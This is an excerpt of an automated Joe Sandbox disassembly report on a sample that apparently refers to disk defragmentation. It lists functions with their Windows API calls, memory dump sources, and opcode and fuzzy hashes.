                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6861e29f0088fe8bf2482069452547d46f2b3a812a60965592cc082a0fa155da
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B21D2B6608351AFC310DE59D880E6BBBE8EBD9305F00495DF8849B302D275EC458BB6
                                                                                                                                                                                                                                                                                    Function 00424850 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 80sleepCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419AE0: GetModuleHandleW.KERNEL32(ntdll,NtQuerySystemInformation), ref: 00419B01
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419AE0: GetProcAddress.KERNEL32(00000000), ref: 00419B08
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 004248FF
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleModuleProcSleep
                                                                                                                                                                                                                                                                                    • String ID: CPUUsageExceed$DiskDefrag\AutoDefragmention$d
                                                                                                                                                                                                                                                                                    • API String ID: 451317006-1228882529
                                                                                                                                                                                                                                                                                    • Opcode ID: 927e2202433fb9e42a6fe3e98e5b36a04668a5a885c84e3f0056aeb2df8c8ff7
                                                                                                                                                                                                                                                                                    • Instruction ID: 2aae77fe05b5572fc9a22550ba8b2e73634bf3b6c40b7b563c05c91186231963
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 927e2202433fb9e42a6fe3e98e5b36a04668a5a885c84e3f0056aeb2df8c8ff7
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6021D439B102224BD724DE68DD84BE73351DFC4325F5A4279ED098F382DB66EC468299
                                                                                                                                                                                                                                                                                    Function 00463530 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,00090073,?,00000008,00000000,00000800,?,00000000), ref: 00463572
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00463581
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,00090073,?,00000008,00000000,?,?,00000000), ref: 004635C1
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004635C7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ControlDeviceErrorLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2645620995-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 280114bd6b1db9933460ef4d3ecd134f68ed06276e5ba2ce953f9defbee2e827
                                                                                                                                                                                                                                                                                    • Instruction ID: 72788d8031d8da8ebdf27af98cafe7d3eb32084a5d4fa9d01f0a72895e77951c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 280114bd6b1db9933460ef4d3ecd134f68ed06276e5ba2ce953f9defbee2e827
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8711C4716003412BE3109B169C46BAB769CEBD1710F44483EF548E6151EAA8EA098BEF
                                                                                                                                                                                                                                                                                    Function 0041AA90 Relevance: 6.1, APIs: 4, Instructions: 68windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 0041AADC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0041AAF4
                                                                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 0041AB1C
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 0041AB37
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExtentMessagePoint32ReleaseSendText
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3220701275-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f4cd1229affaa01fb9d254a5843e7c69072dcfbfd1d68eba2fa87ff3b855b585
                                                                                                                                                                                                                                                                                    • Instruction ID: 1850dbf4910a2f6436d9a8060cce1c0b3c7b383cd418d825aeeea627d68539a0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4cd1229affaa01fb9d254a5843e7c69072dcfbfd1d68eba2fa87ff3b855b585
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79213AB5604601AFC714DF68D985F6AB7E8FB8C710F008A2DF459C3690DB74E8448B95
                                                                                                                                                                                                                                                                                    Function 00503B1B Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00503B37
                                                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00503B50
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Value___vcrt_
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1426506684-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c3eb6bf0a7234faedb7c0a201c394f7478a2313920b75adf210bd18b39fa6472
                                                                                                                                                                                                                                                                                    • Instruction ID: 7e37d591e5fb7ec4360ecac0c59ba3527d828e2593e8c178730152400d6c93e2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3eb6bf0a7234faedb7c0a201c394f7478a2313920b75adf210bd18b39fa6472
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD01DF322096625EEB643BB8FC8EA6F3F9CFB82778720033AF524550E1EF514E555149
                                                                                                                                                                                                                                                                                    Function 00454FD0 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00454FE5
                                                                                                                                                                                                                                                                                    • __alldvrm.LIBCMT ref: 00454FF8
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045500B
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00455044
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__alldvrm__allrem
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2089711351-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 9e2e06a4a2c618b65764ecf02f880869a055206a9d0490231dd6032392fa1694
                                                                                                                                                                                                                                                                                    • Instruction ID: 1642b9dd75f3a4511d1f743995959062418e168b9dabd897861ea646df64c966
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e2e06a4a2c618b65764ecf02f880869a055206a9d0490231dd6032392fa1694
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44112AB5A00A00AFC324CF66C985D27BBE9EFC8714721C92EB59A87745D675FC40CB64
                                                                                                                                                                                                                                                                                    Function 0046D000 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,?), ref: 0046D047
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 0046D059
                                                                                                                                                                                                                                                                                    • SetCursor.USER32(?,?,?,?,0046CB00,?,00000000,?,?), ref: 0046D06F
                                                                                                                                                                                                                                                                                    • DestroyCursor.USER32(00000000), ref: 0046D07A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Cursor$Load$Destroy
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2883253431-0
                                                                                                                                                                                                                                                                                    • Opcode ID: b526f51bf045ccedc4edf904a989a3b1655f38ad34df7115bdfe87dc4000c200
                                                                                                                                                                                                                                                                                    • Instruction ID: d6e58a44651a1d3402cb24b8e4ad2f5d6b0251b9aafb2ead04931a23fc49c706
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b526f51bf045ccedc4edf904a989a3b1655f38ad34df7115bdfe87dc4000c200
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E016771F142189FD730AF6AEC8096B37DCE756318F15083BE108D3211DA79A442877D
                                                                                                                                                                                                                                                                                    Function 00467680 Relevance: 6.0, APIs: 4, Instructions: 36windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00000000), ref: 004676B7
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000403,00000003,000001F4), ref: 004676CC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000403,00000002,00001770), ref: 004676E1
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,00000190), ref: 004676F6
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3e2714244d5c6f65102f12cb8e05017cbdfaef3b4b34307461ffb964c10c16d6
                                                                                                                                                                                                                                                                                    • Instruction ID: 05ecc198b00069830d56908e8e3e5e7e1269b8f0e776762def572f81c0fca120
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e2714244d5c6f65102f12cb8e05017cbdfaef3b4b34307461ffb964c10c16d6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EF01D717C0B027AE2309A68DC82FA7A2A86B94B02F15582DF359FB1D196B875018E58
                                                                                                                                                                                                                                                                                    Function 00460400 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 353COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
